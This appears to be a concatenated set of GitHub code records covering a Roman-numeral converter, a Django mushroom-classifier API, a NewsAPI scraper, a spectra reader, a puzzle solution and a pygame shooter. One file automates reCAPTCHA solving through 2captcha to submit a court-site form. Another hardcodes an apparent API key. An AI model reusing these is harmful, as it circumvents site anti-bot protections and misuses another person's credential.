while(self.number>=500):\n# self.roman+=\"D\"\n# self.number-=500\n# while(self.number>=100):\n# self.roman+=\"C\"\n# self.number-=100 \n# while(self.number>=50):\n# self.roman+=\"L\"\n# self.number-=50\n# while(self.number>=10):\n# self.roman+=\"X\"\n# self.number-=10\n# while(self.number>=5):\n# self.roman+=\"V\"\n# self.number-=5 \n# while(self.number>=1):\n# self.roman+=\"I\"\n# self.number-=1 \n\n# return self.roman\n\nclass DecimalToRomanNumeral():\n numerals = {1000:\"M\",500:\"D\",100:\"C\",50:\"L\",10:\"X\",5:\"V\",1:\"I\"}\n words = {\n 0:\"\",\n 1:\"One\",\n 2:\"Two\",\n 3:\"Three\",\n 4:\"Four\",\n 5:\"Five\",\n 6:\"Six\",\n 7:\"Seven\",\n 8:\"Eight\",\n 9:\"Nine\",\n 10:\"Ten\",\n 11:\"Eleven\",\n 12:\"Twelve\",\n 13:\"Thirteen\",\n 14:\"Fourteen\",\n 15:\"Fifteen\",\n 16:\"Sixteen\",\n 17:\"Seventeen\",\n 18:\"Eighteen\",\n 19:\"Nineteen\",\n 20:\"Twenty\",\n 30:\"Thirty\",\n 40:\"Forty\",\n 50:\"Fifty\",\n 60:\"Sixty\",\n 70:\"Seventy\",\n 80:\"Eighty\",\n 90:\"Ninety\"\n }\n # in words\n def __init__(self,number):\n self.orig_number = number\n self.number = number\n self.roman = \"\"\n self.thousand_word = \"\"\n self.hundred_word = \"\"\n # in symbols\n def convert(self):\n for key, value in (self.numerals).items():\n while(self.number>=key):\n self.roman+=value\n self.number-=key\n \n return self.roman\n\n def displayInWords(self):\n self.number = self.orig_number\n self.thousands = math.floor(self.number/1000)\n self.hundreds = math.floor((self.number%1000)/100)\n self.tens = math.floor(self.number%100)\n if self.thousands == 0:\n pass\n else:\n self.thousand_word = \"thousand\"\n if self.hundreds == 0:\n pass\n else:\n self.hundred_word = \"-hundred\"\n\n if self.tens<=20 or self.tens in [20,30,40,50,60,70,80,90]: \n return f\"\"\"{self.words[self.thousands]} {self.thousand_word} \n {self.words[self.hundreds]}{self.hundred_word} \n {self.words[self.tens]}\"\"\"\n elif self.tens>20:\n self.tens = math.floor((self.number%100)/10)*10\n self.ones = math.floor(self.number%10)\n return f\"\"\"{self.words[self.thousands]} {self.thousand_word} \n {self.words[self.hundreds]}{self.hundred_word} \n {self.words[self.tens]} {self.words[self.ones]}\"\"\"\n\ndecimal = int(input(\"Enter a decimal number: \"))\nconverter = DecimalToRomanNumeral(decimal)\nprint(converter.convert())\nprint(converter.displayInWords())","repo_name":"roycechua/advanced-python-programming","sub_path":"classes_exercise2.py","file_name":"classes_exercise2.py","file_ext":"py","file_size_in_byte":3421,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"43993307692","text":"from django.http import JsonResponse\nfrom rest_framework import viewsets\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom .serializers import MushroomSerializer\nfrom .models import Mushroom\nfrom django.views.decorators.csrf import csrf_exempt, ensure_csrf_cookie\nfrom fastai.vision.all import load_learner\nimport numpy as np\nimport cv2\n\nlearn = load_learner(\"./model/model_v1.25.pkl\")\nlabels = learn.dls.vocab\n\n# Create your views here.\n\n\nclass MushroomViewSet(viewsets.ModelViewSet):\n queryset = Mushroom.objects.all()\n serializer_class = MushroomSerializer\n\n\n@api_view(['GET'])\ndef search_mushrooms(request):\n name = request.query_params.get('name', '')\n mushrooms = Mushroom.objects.filter(name__icontains=name)\n serializer = MushroomSerializer(mushrooms, many=True)\n return Response(serializer.data)\n\n\n@csrf_exempt\ndef predict_mushroom(request):\n try:\n # Read binary data from request body\n img_data = request.body\n\n # Convert binary data to numpy array\n img_array = np.frombuffer(img_data, np.uint8)\n\n # Decode the numpy array as an image using OpenCV\n img = cv2.imdecode(img_array, cv2.IMREAD_COLOR)\n pred, pred_idx, probs = learn.predict(img)\n # get the top 5 predictions\n mashed_ = []\n for mushroom_, prob in zip(learn.dls.vocab, probs):\n mashed_.append({'mushroom': mushroom_, 'probability': prob.item()})\n sorted_mashed = sorted(\n mashed_, key=lambda x: x['probability'], reverse=True)\n top_5_mushrooms = sorted_mashed[:5]\n\n # print(top_5_mushrooms[0].get('mushroom'))\n JsonRes = []\n\n\n for i in range(5):\n mushroom = Mushroom.objects.filter(\n s_name__icontains=top_5_mushrooms[i].get('mushroom'))\n serializer = MushroomSerializer(mushroom, many=True)\n\n if serializer.data: # Check if the queryset is not empty\n JsonRes.append(\n {\n 'predicted_id': serializer.data[0]['id'],\n 'predicted_name': serializer.data[0]['name'],\n 'name': top_5_mushrooms[i].get('mushroom'),\n 'probability': top_5_mushrooms[i].get('probability')\n }\n )\n else:\n JsonRes.append(\n {\n 'predicted_id': None,\n 'predicted_name': \"Not currently in database\",\n 'name': top_5_mushrooms[i].get('mushroom'),\n 'probability': top_5_mushrooms[i].get('probability')\n }\n )\n\n return JsonResponse(JsonRes, safe=False)\n except Exception as e:\n return JsonResponse({'error': str(e)}, status=400)\n\n\n@csrf_exempt\ndef predict_more_mushroom(request):\n try:\n if request.method == 'POST':\n # Initialize an empty dictionary to store cumulative probabilities\n cumulative_probabilities = {}\n\n # Iterate through the uploaded files\n num_images = 0\n for key in request.FILES:\n img_file = request.FILES[key]\n img_data = img_file.read()\n img_array = np.frombuffer(img_data, np.uint8)\n img = cv2.imdecode(img_array, cv2.IMREAD_COLOR)\n\n pred, pred_idx, probs = learn.predict(img)\n\n # Update the cumulative probabilities\n for mushroom_, prob in zip(learn.dls.vocab, probs):\n if mushroom_ in cumulative_probabilities:\n cumulative_probabilities[mushroom_] += prob.item()\n else:\n cumulative_probabilities[mushroom_] = prob.item()\n\n num_images += 1\n\n # Calculate the average probabilities\n average_probabilities = {mushroom_: (cumulative_prob / num_images) for mushroom_, cumulative_prob in cumulative_probabilities.items()}\n\n # Get the top 5 results based on the average probabilities\n sorted_probabilities = sorted(average_probabilities.items(), key=lambda x: x[1], reverse=True)\n top_5_mushrooms = sorted_probabilities[:5]\n print(average_probabilities)\n\n # ... Add the rest of your code here to return the JsonResponse\n # ... (as in your original predict_mushroom function)\n JsonRes = []\n for i in range(5):\n mushroom = Mushroom.objects.filter(\n s_name__icontains=top_5_mushrooms[i][0])\n serializer = MushroomSerializer(mushroom, many=True)\n\n if serializer.data: # Check if the queryset is not empty\n JsonRes.append(\n {\n 'predicted_id': serializer.data[0]['id'],\n 'predicted_name': serializer.data[0]['name'],\n 'name': top_5_mushrooms[i][0],\n 'probability': top_5_mushrooms[i][1],\n }\n )\n else:\n JsonRes.append(\n {\n 'predicted_id': None,\n 'predicted_name': \"Not currently in database\",\n 'name': top_5_mushrooms[i][0],\n 'probability': top_5_mushrooms[i][1],\n }\n )\n return JsonResponse(JsonRes, safe=False)\n except Exception as e:\n return JsonResponse({'error': str(e)}, status=400)\n","repo_name":"jkhammerseth/shroomyApp","sub_path":"backend/mushroomIdentifyer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5648,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41534698842","text":"import requests\nimport json\nfrom random import*\n\ntheme = [\"jaunes\", \"gilets\", \"sport\", \"brexit\", \"climat\"]\nN=choice(theme)\nchoisi=[]\nchoisi.append(N)\nprint(choisi)\n \nf = open('ARTICLES.txt','w')\n \nurl='https://newsapi.org/v2/everything?sources=le-monde&apiKey=30274f542d134b74a8e47c88110d11e0'\ndata_raw = requests.get(url).json() #articles récents\n \n \ndel data_raw[\"status\"]\ndel data_raw[\"totalResults\"]\n \narticles = data_raw.get('articles')\n \nliste1 =[]\nliste2 =[]\n \nfor data in articles:\n for key, value in data.items():\n if (key == 'title'):\n liste1.append(value)\n elif(key=='content'):\n liste2.append(value)\n \n \nfor i in range (len(liste1)):\n if ('jaunes' in liste1[i]):\n f.write(\"TITRE : \"+liste1[i]+\"\\n\"+\"CONTENU : \"+liste2[i]+\"\\n\\n\\n\")\nf.close()\n\n\nprint(f)","repo_name":"ManonFrl/fakenews","sub_path":"fkn.py","file_name":"fkn.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37517600853","text":"#! /usr/bin/env python3\n\n#####################################################\n# The example shows how to extract a line scan data #\n# from a StreamLine HR measurement #\n#####################################################\n\nimport numpy as np\nfrom renishawWiRE import WDFReader\nfrom _path import curdir, imgdir\n\ntry:\n import matplotlib.pyplot as plt\n\n plot = True\nexcept ImportError:\n plot = False\n\n\ndef main():\n filename = curdir / \"spectra_files\" / \"line.wdf\"\n reader = WDFReader(filename)\n assert reader.measurement_type == 3\n\n # For mapping, xdata is still wavenumber\n wn = reader.xdata\n spectra = reader.spectra\n assert wn.shape[0] == spectra.shape[1]\n # Now spectra.shape becomes (i, j, spectrum)\n print(wn.shape, spectra.shape)\n if plot is True:\n # Level the spectra with baseline intensity\n spectra = spectra - spectra.min(axis=1, keepdims=True)\n # Need to revert matrix for plotting\n spectra = spectra.T\n plt.figure(figsize=(6, 4))\n # plot the first 5 spectra\n for i in range(5):\n plt.plot(wn, spectra[:, i], label=\"{0:d}\".format(i))\n plt.legend()\n plt.xlabel(\"Wavenumber (1/cm)\")\n plt.ylabel(\"Intensity (ccd counts)\")\n plt.title(\"Spectra from line.wdf\")\n plt.show(block=False)\n plt.pause(3)\n plt.tight_layout()\n plt.savefig(imgdir / \"linscan.png\", dpi=100)\n plt.close()\n else:\n print(\"Wavenumber is like:\", wn)\n print(\"Spectra matrix is like: \\n\", spectra)\n\n return\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"alchem0x2A/py-wdf-reader","sub_path":"examples/ex3_linscan.py","file_name":"ex3_linscan.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"53"} +{"seq_id":"71162516009","text":"import requests\nimport config\nimport re\nimport string\nimport urllib.parse\n\nfrom lxml import etree, html\nfrom time import sleep\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.support import expected_conditions as ec\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\n\ndef captchaReader(htmlContent):\n return html.fromstring(htmlContent).xpath('string(//*[@data-sitekey]/@data-sitekey)')\n\ndef captchaResult(args, headers):\n task = re.search('OK\\|(?P.+)', args)\n if task is None:\n raise Exception(args)\n url = 'http://2captcha.com/res.php'\n querystring = {\"key\":config.apiKey,\"action\":\"get\",\"id\":task['id']}\n while True:\n sleep(5)\n result = requests.request(\"POST\", url, headers=headers, params=querystring).text\n if result == 'ERROR_CAPTCHA_UNSOLVABLE':\n raise Exception(result)\n if result != 'CAPCHA_NOT_READY':\n return result[3::]\n\ndef solveCaptcha(siteKey, siteUrl):\n url = 'https://2captcha.com/in.php'\n host = '2captcha.com'\n\n querystring = {\"key\":config.apiKey,\"method\":\"userrecaptcha\",\"googlekey\":siteKey,\"pageurl\":siteUrl}\n\n headers = {\n 'Accept': \"*/*\",\n 'Cache-Control': \"no-cache\",\n 'Host': host,\n 'Accept-Encoding': \"gzip, deflate\",\n 'Content-Length': \"0\",\n 'Connection': \"keep-alive\",\n 'cache-control': \"no-cache\"\n }\n\n args = requests.request(\"POST\", url, headers=headers, params=querystring).text\n\n return captchaResult(args, headers)\n\ndef getCaptchaResponse(htmlContent, siteUrl):\n challenge = captchaReader(htmlContent)\n hashResult = solveCaptcha(challenge, siteUrl)\n return hashResult\n\ndef clickAction(url, headers, querystring, hashResult):\n driver = webdriver.Chrome()\n #storing the cookies generated by the browser\n request_cookies_browser = driver.get_cookies()\n urlAction = \"{}?{}\".format(url, urllib.parse.urlencode(querystring))\n driver.get(urlAction)\n driver.execute_script('var element=document.getElementById(\"g-recaptcha-response\"); element.style.display=\"\";')\n driver.execute_script('document.getElementById(\"g-recaptcha-response\").innerHTML=\"{}\"'.format(hashResult))\n driver.execute_script('document.getElementById(\"formConsulta\").submit()')\n return driver.page_source","repo_name":"dannncampos/TJSPcrawler","sub_path":"src/Useful/CaptchaSolver.py","file_name":"CaptchaSolver.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"1987069349","text":"import math\nimport collections\nimport itertools\nimport re\nimport ast\nimport functools\nfrom collections import defaultdict\nfrom z3 import If, Int, Solver\nfrom z3 import *\nimport copy\n\nT = \"bb.txt\"\nM = \"aa.txt\"\n\nfile1 = open(M, 'r')\nlines = file1.read().splitlines()\nvalves = {}\n\nfor line in lines:\n parts = line.split()\n valve = parts[1]\n flow_rate = int(parts[4][5:-1])\n lead_to = ''.join(parts[9:]).split(',')\n valves[valve] = (flow_rate, lead_to)\n\nvalve_to_num = {}\nfor key in sorted(valves.keys()):\n valve_to_num[key] = 1 << len(valve_to_num)\n\nvalves = {\n valve_to_num[valve]: (flow_rate, tuple(map(valve_to_num.get, lead_to)))\n for valve, (flow_rate, lead_to) in valves.items()\n}\n\ndef part1():\n\n states = [(valve_to_num['AA'], 0, 0)]\n\n best = {}\n\n for t in range(1, 31):\n new_states = []\n for loc, opened, pressure in states:\n key = (loc, opened)\n if key in best and pressure <= best[key]:\n continue\n best[key] = pressure\n flow_rate, lead_to = valves[loc]\n if loc & opened == 0 and flow_rate > 0:\n new_states.append((loc, opened | loc, pressure + flow_rate * (30 - t)))\n for dest in lead_to:\n new_states.append((dest, opened, pressure))\n states = new_states\n print('pt1', max(pressure for a, b, pressure in states))\n\n\npart1()\n","repo_name":"halitanildonmez/advent-of-code-2022","sub_path":"2022/day16/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20589113437","text":"import pygame \r\nimport sys\r\nimport codecs\r\nimport copy\r\nimport ctypes\r\nimport random\r\nimport time\r\nimport os\r\nfrom pygame import mixer\r\n\r\n\r\nwin1 = False\r\nS = True\r\nscore = 0\r\nD = True\r\nR = False\r\nGolos = False\r\ndie = [\"data\\music\\death\\die1.mp3\", \"data\\music\\death\\die2.mp3\"]\r\nfile = [\"data\\music\\gameplay\\gameplay1.mp3\", \"data\\music\\gameplay\\gameplay2.mp3\", \"data\\music\\gameplay\\gameplay3.mp3\", \"data\\music\\gameplay\\gameplay4.mp3\", \"data\\music\\gameplay\\gameplay5.mp3\"]\r\nfile1 = \"data\\music\\menu\\menu.mp3\"\r\ncry = \"data\\music\\cry.mp3\"\r\nbossM = r\"data\\music\\boss.mp3\"\r\nGolosovanie = \"data\\music\\Golosovanie.mp3\"\r\nmixer.init()\r\nGP = [pygame.mixer.Sound('data\\music\\gameplay\\gameplay1.wav')]\r\nmenu = pygame.mixer.Sound('data\\music\\menu\\menu.wav')\r\nWIDTH = 1000\r\nHEIGHT = 600\r\ndead = False\r\nok = False\r\nokx = -273\r\noky = 835\r\ncount = 5\r\nside = 1\r\nk = 1\r\nclock = pygame.time.Clock()\r\nuser32 = ctypes.windll.user32\r\nscreenSize = user32.GetSystemMetrics(0) / 2, user32.GetSystemMetrics(1) / 2\r\nwidth = 80\r\nheight = 110\r\nl = [1000, 600]#[int(i) * 2 for i in screenSize]\r\nl0 = [500, 300]#[int(i) for i in screenSize]\r\nsize = (l)\r\npygame.init()\r\nwin = False\r\npygame.display.set_caption('DavArm')\r\nscreen = pygame.display.set_mode(size)\r\nx = l0[0] - width / 2\r\nx0 = x * 2\r\ny = l0[1] - height / 2 +100\r\nst = [50, 70] \r\nspeed = 8\r\nisJump = False\r\njump = 10\r\nhardmod = False\r\nleft = False\r\nright = False\r\nup = False\r\nanim = 0\r\nbossD = False\r\nlastM = 'right'\r\nface = 'r'\r\nenanim = 0\r\nI = True\r\nS = True\r\nboss1 = False\r\nHat = pygame.image.load(r'data\\Head\\Hat.png')\r\nOk = pygame.image.load(r'data\\prfiles\\Ok.png')\r\ng = [0, 450, 20, 10]\r\nH = [pygame.image.load(r'data\\Head\\MHead.png'), pygame.image.load(r'data\\Head\\AHead.png'), pygame.image.load(r'data\\Head\\DHead.png'), pygame.image.load(r'data\\Head\\ArHead.png')]\r\nBG = pygame.image.load(r'data\\prfiles\\on.png')\r\nwalkR = [pygame.image.load(r'data\\Soldier\\Poses\\rw1.png'), pygame.image.load(r'data\\Soldier\\Poses\\rw2.png')]\r\nwalkL = [pygame.image.load(r'data\\Soldier\\Poses\\lw1.png'), pygame.image.load(r'data\\Soldier\\Poses\\lw2.png')]\r\nwalkYL = [pygame.image.load(r'data\\Soldier\\Poses\\ylfwalk.png'), pygame.image.load(r'data\\Soldier\\Poses\\ylfwalk1.png')]\r\nwalkYR = [pygame.image.load(r'data\\Soldier\\Poses\\yrfwalk.png'), pygame.image.load(r'data\\Soldier\\Poses\\yrfwalk1.png')]\r\nak47L = pygame.image.load(r'data\\Weapons\\ak47L.png')\r\nak47R = pygame.image.load(r'data\\Weapons\\ak47R.png')\r\nBulletL = pygame.image.load(r'data\\Weapons\\BulletL.png')\r\nBulletR = pygame.image.load(r'data\\Weapons\\BulletR.png')\r\nStandAn = pygame.image.load(r'data\\Soldier\\Poses\\s.png')\r\nLJ = pygame.image.load(r'data\\Soldier\\Poses\\lj.png')\r\nRJ = pygame.image.load(r'data\\Soldier\\Poses\\rj.png')\r\nS2 = pygame.image.load(r'data\\Soldier\\Poses\\s2.png')\r\nSS = pygame.image.load(r'data\\Soldier\\Poses\\ss.png')\r\nJL = pygame.image.load(r'data\\Soldier\\Poses\\jl.png')\r\nRZombie1 = [pygame.image.load(r'data\\Zombie\\Poses\\rzombie_action1.png'), pygame.image.load(r'data\\Zombie\\Poses\\rzombie_action2.png')]\r\nLZombie1 = [pygame.image.load(r'data\\Zombie\\Poses\\lzombie_action1.png'), pygame.image.load(r'data\\Zombie\\Poses\\lzombie_action2.png')]\r\nSCR = pygame.image.load(r'data\\prfiles\\scrimer.jpg')\r\nSCR = pygame.transform.scale(SCR, (l[0], l[1]))\r\nBG = pygame.transform.scale(BG, (l[0], l[1]))\r\nV = True\r\n\r\ndef load_image(name, colorkey=None):\r\n fullname = os.path.join('data', name)\r\n try:\r\n image = pygame.image.load(fullname)\r\n except pygame.error as message:\r\n print('Cannot load image:', name)\r\n raise SystemExit(message)\r\n image = image.convert_alpha()\r\n if colorkey is not None:\r\n if colorkey is -1:\r\n colorkey = image.get_at((0, 0))\r\n image.set_colorkey(colorkey)\r\n return image\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\nclass Enemy(pygame.sprite.Sprite):\r\n\r\n image = load_image(r'Zombie\\Poses\\rzombie_action1.png')\r\n def __init__(self, x, y, l, group):\r\n super().__init__(group)\r\n self.x, self.y = x, y\r\n self.size = l\r\n self.image = Enemy.image\r\n self.vel=10\r\n self.y1 = random.randint(self.size[1] / 2, self.size[1]-100)\r\n self.ch = random.randint(0,1)\r\n self.vel = 7\r\n if self.ch == 1:\r\n self.x1 = -50 \r\n else:\r\n self.x1 = l[0]\r\n self.anim = 0\r\n self.head = 0\r\n \r\n \r\n \r\n def RN(self):\r\n x1 = random.randint(self.size[0], self.size[0])\r\n y1 = random.randint(0, (self.size[1]) / 2)\r\n return x0, y0\r\n def move(self):\r\n self.y1+=10\r\n\r\n def draw(self, screen, x, R):\r\n if self.anim + 1 >= 20:\r\n self.anim = 0 \r\n if self.head + 1 >= 20:\r\n self.head = 0 \r\n if not(R):\r\n if self.x1 <= x:\r\n screen.blit(RZombie1[self.anim // 10], (self.x1, self.y1))\r\n self.anim += 1\r\n if self.x1 > x:\r\n screen.blit(LZombie1[self.anim // 10], (self.x1, self.y1)) \r\n self.anim += 1\r\n else:\r\n screen.blit(H[self.head // 10], (self.x1, self.y1))\r\n self.head += 1\r\n \r\n\r\n\r\n\r\nclass snaryad():\r\n\r\n def __init__(self, x, y, facing):\r\n self.x = x\r\n self.y = y\r\n self.facing = facing\r\n self.vel = 30 * facing\r\n\r\n def draw(self, screen):\r\n if self.facing == -1:\r\n screen.blit(BulletL, (self.x, self.y))\r\n if self.facing == 1:\r\n screen.blit(BulletR, (self.x, self.y))\r\n\r\nclass Boss():\r\n def __init__(self, l0):\r\n self.x = l0[0]\r\n self.y = l0[1]\r\n self.vel = 15\r\n self.heal = 100\r\n self.font = pygame.font.Font(None, 30) \r\n self.text = self.font.render(\"Thief\",True, (255, 0, 0)) \r\n def draw(self):\r\n screen.blit(self.text, (self.x, self.y - 40)) \r\n pygame.draw.rect(screen, (255, 0, 0), (self.x, self.y - 20, 100, 20))\r\n pygame.draw.rect(screen, (0, 255, 0), (self.x, self.y - 20, 100 - (100 - self.heal), 20))\r\n screen.blit(H[3], (self.x, self.y)) \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\ndef drawWin():\r\n global R\r\n global anim\r\n global face\r\n global okx\r\n global oky\r\n screen.fill((0, 0, 0))\r\n pygame.draw.rect(screen, (30, 30, 30), (0, 330, 1000, 270))\r\n pygame.draw.circle(screen, (255, 255, 255), (160, 60), 5) \r\n pygame.draw.circle(screen, (255, 255, 255), (400, 244), 5) \r\n pygame.draw.circle(screen, (255, 255, 255), (327, 180), 5) \r\n pygame.draw.circle(screen, (255, 255, 255), (400, 130), 5) \r\n pygame.draw.circle(screen, (255, 255, 255), (500, 200), 5) \r\n pygame.draw.circle(screen, (255, 255, 255), (320, 85), 5) \r\n pygame.draw.circle(screen, (255, 255, 255), (240, 70), 5) \r\n pygame.draw.circle(screen, (255, 255, 255), (40, 60), 5) \r\n pygame.draw.circle(screen, (255, 255, 255), (600, 280), 5) \r\n pygame.draw.circle(screen, (255, 255, 255), (100, 250), 5) \r\n pygame.draw.circle(screen, (255, 255, 255), (750, 140), 5) \r\n pygame.draw.circle(screen, (255, 255, 255), (670, 100), 5) \r\n pygame.draw.circle(screen, (155, 155, 155), (900, 100), 60) \r\n pygame.draw.circle(screen, (255, 255, 255), (920, 120), 10) \r\n pygame.draw.circle(screen, (255, 255, 255), (885, 85), 7) \r\n st[0], st[1] = 0, 0\r\n for i in range(0, 30):\r\n pygame.draw.rect(screen, (255, 255, 255), (g))\r\n g[0] += 40\r\n g[0] = 0\r\n if anim + 1 >= 6:\r\n anim = 0\r\n if R:\r\n screen.blit(H[2], (x, y))\r\n if not(R):\r\n if left:\r\n \r\n if isJump:\r\n screen.blit(LJ, (x, y))\r\n else:\r\n screen.blit(walkL[anim // 3], (x, y))\r\n screen.blit(ak47L, (x + width/2-40, y + height/2+ 20))\r\n anim += 1\r\n elif right:\r\n \r\n if isJump:\r\n \r\n screen.blit(RJ, (x, y))\r\n else:\r\n screen.blit(walkR[anim // 3], (x, y))\r\n screen.blit(ak47R, (x + width/2-20, y + height/2 +20))\r\n anim += 1\r\n \r\n \r\n elif up:\r\n if face == 'l':\r\n screen.blit(walkYL[anim // 3], (x, y))\r\n screen.blit(ak47L, (x + width / 2 - 40, y + height / 2 + 20))\r\n anim += 1\r\n \r\n elif face == 'r':\r\n screen.blit(walkYR[anim // 3], (x, y))\r\n screen.blit(ak47R, (x + width / 2 - 20, y + height / 2 + 20))\r\n anim += 1\r\n\r\n\r\n else:\r\n if isJump:\r\n if face == 'r':\r\n screen.blit(S2, (x, y))\r\n elif face == 'l':\r\n screen.blit(JL, (x, y))\r\n else:\r\n if face == 'r':\r\n screen.blit(StandAn, (x, y))\r\n screen.blit(ak47R, (x + width / 2 - 20, y + height / 2 + 20))\r\n elif face == 'l':\r\n screen.blit(SS, (x, y))\r\n screen.blit(ak47L, (x + width / 2 - 40, y + height / 2 + 20))\r\n\r\n for bull in bulls:\r\n bull.draw(screen)\r\n for ens in enemy: \r\n ens.draw(screen, x, R)\r\n boss = Boss(l0)\r\nall_sprites = pygame.sprite.Group()\r\nrunning = True\r\nbulls = []\r\nenemy = []\r\n\r\ndef start_screen():\r\n intro_text = [\" Вас приветствует игра DavArm\", \r\n \" Правила игры очень просты:\", \r\n \" Отстреливайтесь от зомби и набирайте очки\", \r\n \" При нажатии на определеные клавиши пробуждается босс\",\r\n \" В игре скрыты несколько пасхалок, характристика которых есть в описании \", \r\n \" Максимальное количество зомби на карте 20\",\"\",\"\",\"\",\"\" \r\n \" На кнопки 1-5 можно переключать музыку\", \r\n \" Желаем удачи!\", \r\n \" Для начала игры нажми ЛКМ\"]\r\n\r\n fon = pygame.transform.scale(pygame.image.load('data\\prfiles\\zastavka1.png'), (WIDTH, HEIGHT))\r\n screen.blit(fon, (0, 0))\r\n font = pygame.font.Font(r'data\\prfiles\\13882.otf', 40)\r\n text_coord = 50\r\n for line in intro_text:\r\n string_rendered = font.render(line, 1, pygame.Color(255, 255, 255))\r\n intro_rect = string_rendered.get_rect()\r\n text_coord += 10\r\n intro_rect.top = text_coord\r\n intro_rect.x = 10\r\n text_coord += intro_rect.height\r\n screen.blit(string_rendered, intro_rect)\r\n mus = True\r\n while True:\r\n pygame.display.flip() \r\n while mus:\r\n pygame.mixer.music.load(file1) \r\n pygame.mixer.music.set_volume(0.5)\r\n pygame.mixer.music.play(-1) \r\n mus = False\r\n for event in pygame.event.get(): \r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n menu.stop()\r\n return \r\nboss = Boss(l0)\r\nstart_screen()\r\nwhile running:\r\n keys = pygame.key.get_pressed()\r\n if D:\r\n pygame.mixer.music.load(file[0])\r\n pygame.mixer.music.set_volume(0.5)\r\n pygame.mixer.music.play(-1) \r\n D = False\r\n if not(boss1):\r\n if keys[pygame.K_1]:\r\n pygame.mixer.music.load(file[0])\r\n pygame.mixer.music.set_volume(0.5)\r\n pygame.mixer.music.play(-1)\r\n if keys[pygame.K_2]:\r\n pygame.mixer.music.load(file[1]) \r\n pygame.mixer.music.set_volume(0.5)\r\n pygame.mixer.music.play(-1)\r\n if keys[pygame.K_3]:\r\n pygame.mixer.music.load(file[2]) \r\n pygame.mixer.music.set_volume(0.5)\r\n pygame.mixer.music.play(-1)\r\n if keys[pygame.K_4]:\r\n pygame.mixer.music.load(file[3]) \r\n pygame.mixer.music.set_volume(0.5)\r\n pygame.mixer.music.play(-1)\r\n if keys[pygame.K_5]:\r\n pygame.mixer.music.load(file[4]) \r\n pygame.mixer.music.set_volume(0.5)\r\n pygame.mixer.music.play(-1) \r\n if keys[pygame.K_f]:\r\n if not(R):\r\n R = True \r\n if R:\r\n if keys[pygame.K_h]:\r\n hardmod = True\r\n if keys[pygame.K_b]:\r\n boss1 = True\r\n else:\r\n if keys[pygame.K_b]:\r\n boss1 = True \r\n \r\n if keys[pygame.K_o]:\r\n ok = True \r\n\r\n \r\n#GP[0].play()\r\n drawWin()\r\n pygame.time.delay(30)\r\n for event in pygame.event.get():\r\n if (event.type == pygame.QUIT) or keys[pygame.K_ESCAPE]:\r\n running = False\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n if event.pos[0] > 540 and event.pos[0] < 580 and event.pos[1] > 450 and event.pos[1] < 460:\r\n pygame.mixer.music.load(Golosovanie)\r\n pygame.mixer.music.set_volume(10)\r\n pygame.mixer.music.play(-1) \r\n if not isJump:\r\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:\r\n \r\n \r\n if lastM == 'right':\r\n facing = 1\r\n else:\r\n facing = -1\r\n if len(bulls) < 5:\r\n drawWin() \r\n ran = random.randint(0,7)\r\n #shoots[ran].play()\r\n bulls.append(snaryad(round(x + width // 2), round(y + height // 2 + 20), facing))\r\n if not(boss1):\r\n count += 1\r\n \r\n if len(enemy) < count:\r\n if count >= 20:\r\n #death.play()\r\n #pygame.mixer.music.stop()\r\n running = False\r\n dead = True\r\n drawWin() \r\n enemy.append(Enemy(x, y, l, all_sprites)) \r\n for bull in bulls:\r\n if bull.x < x0 and bull.x > 0:\r\n bull.x += bull.vel\r\n else:\r\n bulls.pop(bulls.index(bull))\r\n\r\n \r\n if y <= 0:\r\n while I:\r\n pygame.mixer.music.load(cry) \r\n pygame.mixer.music.set_volume(10)\r\n pygame.mixer.music.play(-1) \r\n I = False\r\n screen.blit(SCR, (0, 0)) \r\n if keys[pygame.K_q]:\r\n if screen.get_flags() & pygame.FULLSCREEN:\r\n pygame.display.set_mode(size)\r\n else:\r\n pygame.display.set_mode(size, pygame.FULLSCREEN)\r\n elif keys[pygame.K_a] and x > 5:\r\n face = 'l'\r\n if isJump:\r\n x -= speed + 10\r\n else:\r\n x -= speed\r\n up = False\r\n left = True\r\n right = False\r\n lastM = 'left'\r\n elif keys[pygame.K_d] and x < l[0] - width - 5:\r\n face = 'r'\r\n if isJump:\r\n x += speed + 10\r\n else:\r\n x += speed\r\n up = False\r\n right = True\r\n left = False\r\n lastM = 'right'\r\n else:\r\n up = False\r\n left = False\r\n right = False\r\n\r\n if not (isJump):\r\n if keys[pygame.K_w] and y > 300 or (x < 300 and x > 290):\r\n y -= speed\r\n up = True\r\n if keys[pygame.K_s] and y < l[1] - height - 5:\r\n y += speed\r\n up = True\r\n if keys[pygame.K_SPACE]:\r\n isJump = True\r\n else:\r\n if jump >= -10:\r\n if jump < 0:\r\n y += (jump ** 2) // 4\r\n else:\r\n y -= (jump ** 2) // 4\r\n jump -= 1\r\n else:\r\n isJump = False\r\n jump = 10\r\n for ens in enemy:\r\n \r\n if False:\r\n enemy.pop(enemy.index(ens)) \r\n score += 10\r\n \r\n else:\r\n if not(R):\r\n C = random.randint(0, 5)\r\n if ens.x1 < x:\r\n if C ==1:\r\n ens.x += ens.vel + 50 \r\n ens.x1 += ens.vel \r\n elif ens.x1 > x:\r\n if C ==1:\r\n 